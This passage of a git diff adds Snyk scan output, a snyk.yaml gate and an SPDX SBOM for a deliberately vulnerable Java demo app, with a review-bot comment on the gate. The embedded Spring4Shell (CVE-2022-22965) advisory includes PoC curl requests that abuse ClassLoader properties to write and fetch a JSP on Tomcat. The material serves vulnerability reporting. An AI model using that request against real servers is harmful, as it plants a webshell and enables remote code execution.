"cvssVersion": "3.1", + "modificationTime": "2024-03-30T15:25:03.231650Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. 
The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). 
\r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", + "epssDetails": { + "percentile": "0.99975", + "probability": "0.97485", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22965" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-03-30T21:42:31.436000Z", + "functions_new": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "className": "org.springframework.beans.CachedIntrospectionResults", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-30T21:42:24Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-03-30T22:32:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:17.474380Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.20.RELEASE", + "org.springframework:spring-beans@5.2.20.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:07.017Z", + "expires": "2024-08-08T12:49:06.669Z", + "ignoredBy": { + "id": 
"d9b21e67-191b-45cf-9bc0-f82258937fc6",
+ "name": "austin.doll@snyk.io",
+ "email": "austin.doll@snyk.io"
+ },
+ "reasonType": "not-vulnerable",
+ "disregardIfFixable": false,
+ "source": "api",
+ "path": [
+ "*"
+ ]
+ }
+ ]
+ }
+ }
+ ],
+ "patch": []
+ },
+ "uniqueCount": 133,
+ "projectName": "io.github.snyk:todolist-web-struts",
+ "displayTargetFile": "pom.xml",
+ "hasUnknownVersions": false,
+ "path": "/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts"
+}
diff --git a/todolist-goof/todolist-web-struts/snyk.yaml b/todolist-goof/todolist-web-struts/snyk.yaml
new file mode 100644
index 0000000000..0b37cffe81
--- /dev/null
+++ b/todolist-goof/todolist-web-struts/snyk.yaml
@@ -0,0 +1,5 @@
+version: 2
+customFilters:
+ filter: ".vulnerabilities |= map(if .type == \"license\" and .id == \"snyk:lic:golang:github.com:hashicorp:consul:GPL-1.0\" then empty else . end)"
+ pass: "[.vulnerabilities[] | select(.severity == \"critical\")] | length"
+ msg: "Vulnerabilities found"
diff --git a/todolist-goof/todolist-web-struts/test.json b/todolist-goof/todolist-web-struts/test.json
new file mode 100644
index 0000000000..8443d2fa9d
--- /dev/null
+++ b/todolist-goof/todolist-web-struts/test.json
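Review bot: The `pass` gate in snyk.yaml counts only `severity == "critical"` findings, so high-severity issues in the same report would never fail the check; if a non-zero result is what fails the run, widening it to `pass: "[.vulnerabilities[] | select(.severity == \"critical\" or .severity == \"high\")] | length"` closes that gap. The `filter` entry removes a Go license issue (`snyk:lic:golang:github.com:hashicorp:consul:GPL-1.0`) that is unlikely to ever appear in this Maven project's report, so it looks copied from a template and is a no-op here; either drop it or annotate it, e.g. `# placeholder filter: replace with the issue ids this project actually needs to suppress`. The generic `msg: "Vulnerabilities found"` would be more useful if it named the threshold it enforces, so a failing run is self-explanatory.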
@@ -0,0 +1,2 @@ +{"spdxVersion":"SPDX-2.3","dataLicense":"CC0-1.0","SPDXID":"SPDXRef-DOCUMENT","name":"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT","documentNamespace":"https://snyk.io/spdx/sbom-124097e2-e023-4740-b5b3-e390a82c4b99","creationInfo":{"licenseListVersion":"3.19","creators":["Tool: Snyk SBOM Export API v1.89.0-3-g3a337c8","Organization: Snyk","Tool: Snyk snyk-cli 1.1289.0"],"created":"2024-07-29T13:56:32Z"},"packages":[{"name":"io.github.snyk:todolist-web-struts","SPDXID":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","versionInfo":"0.0.1-SNAPSHOT","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/io.github.snyk/todolist-web-struts@0.0.1-SNAPSHOT"}]},{"name":"io.github.snyk:todolist-web-common","SPDXID":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","versionInfo":"0.0.1-SNAPSHOT","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/io.github.snyk/todolist-web-common@0.0.1-SNAPSHOT"}]},{"name":"org.apache.logging.log4j:log4j-core","SPDXID":"SPDXRef-3-org.apache.logging.log4j-log4j-core-2.7","versionInfo":"2.7","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.logging.log4j/log4j-core@2.7"}]},{"name":"org.apache.logging.log4j:log4j-api","SPDXID":"SPDXRef-4-org.apache.logging.log4j-log4j-api-2.7","versionInfo":"2.7","supplier":
"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.logging.log4j/log4j-api@2.7"}]},{"name":"javax:javaee-web-api","SPDXID":"SPDXRef-5-javax-javaee-web-api-7.0","versionInfo":"7.0","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/javax/javaee-web-api@7.0"}]},{"name":"org.springframework:spring-web","SPDXID":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-web@3.2.6.RELEASE"}]},{"name":"org.apache.struts:struts2-core","SPDXID":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","versionInfo":"2.3.20","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.struts/struts2-core@2.3.20"}]},{"name":"org.apache.struts:struts2-spring-plugin","SPDXID":"SPDXRef-8-org.apache.struts-struts2-spring-plugin-2.3.20","versionInfo":"2.3.20","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKA
GE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.struts/struts2-spring-plugin@2.3.20"}]},{"name":"org.zeroturnaround:zt-zip","SPDXID":"SPDXRef-9-org.zeroturnaround-zt-zip-1.12","versionInfo":"1.12","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.zeroturnaround/zt-zip@1.12"}]},{"name":"javax.xml.bind:jaxb-api","SPDXID":"SPDXRef-10-javax.xml.bind-jaxb-api-2.3.0","versionInfo":"2.3.0","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/javax.xml.bind/jaxb-api@2.3.0"}]},{"name":"com.sun.xml.bind:jaxb-core","SPDXID":"SPDXRef-11-com.sun.xml.bind-jaxb-core-2.3.0","versionInfo":"2.3.0","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/com.sun.xml.bind/jaxb-core@2.3.0"}]},{"name":"com.sun.xml.bind:jaxb-impl","SPDXID":"SPDXRef-12-com.sun.xml.bind-jaxb-impl-2.3.0","versionInfo":"2.3.0","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/com.sun.xml.bind/jaxb-impl@2.3.0"}]},{"name":"com.fasterxml.jackson.core:jackson-core","SPDXID":"SPDXRef-13-com.fasterxml.jackson.core-jackson-core-2.6.5","versionInfo":"2.6.5","supplier":"NOASSERTION"
,"downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/com.fasterxml.jackson.core/jackson-core@2.6.5"}]},{"name":"com.fasterxml.jackson.core:jackson-databind","SPDXID":"SPDXRef-14-com.fasterxml.jackson.core-jackson-databind-2.6.5","versionInfo":"2.6.5","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.6.5"}]},{"name":"com.fasterxml.jackson.core:jackson-annotations","SPDXID":"SPDXRef-15-com.fasterxml.jackson.core-jackson-annotations-2.6.5","versionInfo":"2.6.5","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/com.fasterxml.jackson.core/jackson-annotations@2.6.5"}]},{"name":"io.github.snyk:todolist-core","SPDXID":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","versionInfo":"0.0.1-SNAPSHOT","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/io.github.snyk/todolist-core@0.0.1-SNAPSHOT"}]},{"name":"javax.servlet:jstl","SPDXID":"SPDXRef-17-javax.servlet-jstl-1.2","versionInfo":"1.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyr
ightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/javax.servlet/jstl@1.2"}]},{"name":"org.hibernate:hibernate-validator","SPDXID":"SPDXRef-18-org.hibernate-hibernate-validator-4.3.1.Final","versionInfo":"4.3.1.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate/hibernate-validator@4.3.1.Final"}]},{"name":"commons-collections:commons-collections","SPDXID":"SPDXRef-19-commons-collections-commons-collections-3.1","versionInfo":"3.1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/commons-collections/commons-collections@3.1"}]},{"name":"aopalliance:aopalliance","SPDXID":"SPDXRef-20-aopalliance-aopalliance-1.0","versionInfo":"1.0","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/aopalliance/aopalliance@1.0"}]},{"name":"org.springframework:spring-aop","SPDXID":"SPDXRef-21-org.springframework-spring-aop-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-aop@3.2.6.RELEASE"}]},{"name":"org
.springframework:spring-beans","SPDXID":"SPDXRef-22-org.springframework-spring-beans-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-beans@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-context","SPDXID":"SPDXRef-23-org.springframework-spring-context-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-context@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-core","SPDXID":"SPDXRef-24-org.springframework-spring-core-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-core@3.2.6.RELEASE"}]},{"name":"org.apache.struts.xwork:xwork-core","SPDXID":"SPDXRef-25-org.apache.struts.xwork-xwork-core-2.3.20","versionInfo":"2.3.20","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.struts.xwork/xwork-core@2.3.20"}]},{"name":"org.freemarker:freemarker","SPDXID":"SPDXRef-26-org.freemarker-freemarker-2.3.19","versionInfo":"2.3.19","suppl
ier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.freemarker/freemarker@2.3.19"}]},{"name":"ognl:ognl","SPDXID":"SPDXRef-27-ognl-ognl-3.0.6","versionInfo":"3.0.6","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/ognl/ognl@3.0.6"}]},{"name":"commons-fileupload:commons-fileupload","SPDXID":"SPDXRef-28-commons-fileupload-commons-fileupload-1.3.1","versionInfo":"1.3.1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/commons-fileupload/commons-fileupload@1.3.1"}]},{"name":"commons-io:commons-io","SPDXID":"SPDXRef-29-commons-io-commons-io-2.2","versionInfo":"2.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/commons-io/commons-io@2.2"}]},{"name":"org.apache.commons:commons-lang3","SPDXID":"SPDXRef-30-org.apache.commons-commons-lang3-3.2","versionInfo":"3.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.commons
/commons-lang3@3.2"}]},{"name":"org.slf4j:slf4j-api","SPDXID":"SPDXRef-31-org.slf4j-slf4j-api-1.6.6","versionInfo":"1.6.6","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.slf4j/slf4j-api@1.6.6"}]},{"name":"org.springframework:spring-orm","SPDXID":"SPDXRef-32-org.springframework-spring-orm-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-orm@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-aspects","SPDXID":"SPDXRef-33-org.springframework-spring-aspects-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-aspects@3.2.6.RELEASE"}]},{"name":"cglib:cglib","SPDXID":"SPDXRef-34-cglib-cglib-2.2.2","versionInfo":"2.2.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/cglib/cglib@2.2.2"}]},{"name":"org.aspectj:aspectjweaver","SPDXID":"SPDXRef-35-org.aspectj-aspectjweaver-1.8.2","versionInfo":"1.8.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION
","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.aspectj/aspectjweaver@1.8.2"}]},{"name":"c3p0:c3p0","SPDXID":"SPDXRef-36-c3p0-c3p0-0.9.1.2","versionInfo":"0.9.1.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/c3p0/c3p0@0.9.1.2"}]},{"name":"org.hsqldb:hsqldb","SPDXID":"SPDXRef-37-org.hsqldb-hsqldb-2.3.2","versionInfo":"2.3.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hsqldb/hsqldb@2.3.2"}]},{"name":"org.hibernate:hibernate-core","SPDXID":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","versionInfo":"4.3.7.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate/hibernate-core@4.3.7.Final"}]},{"name":"org.hibernate:hibernate-entitymanager","SPDXID":"SPDXRef-39-org.hibernate-hibernate-entitymanager-4.3.7.Final","versionInfo":"4.3.7.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate/hibernate-entitymanager@4.3.7.Final"}]},{"name":"org.hibernate.javax.persistence:hibernate-jp
a-2.0-api","SPDXID":"SPDXRef-40-org.hibernate.javax.persistence-hibernate-jpa-2.0-api-1.0.1.Final","versionInfo":"1.0.1.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate.javax.persistence/hibernate-jpa-2.0-api@1.0.1.Final"}]},{"name":"javax.validation:validation-api","SPDXID":"SPDXRef-41-javax.validation-validation-api-1.0.0.GA","versionInfo":"1.0.0.GA","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/javax.validation/validation-api@1.0.0.GA"}]},{"name":"org.jboss.logging:jboss-logging","SPDXID":"SPDXRef-42-org.jboss.logging-jboss-logging-3.1.0.CR2","versionInfo":"3.1.0.CR2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.jboss.logging/jboss-logging@3.1.0.CR2"}]},{"name":"org.springframework:spring-expression","SPDXID":"SPDXRef-43-org.springframework-spring-expression-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-expression@3.2.6.RELEASE"}]},{"name":"commons-logging:commons-logging","SPDXID":"SPDXRef-44-commons-logging-commons-logging-1.1.1","version
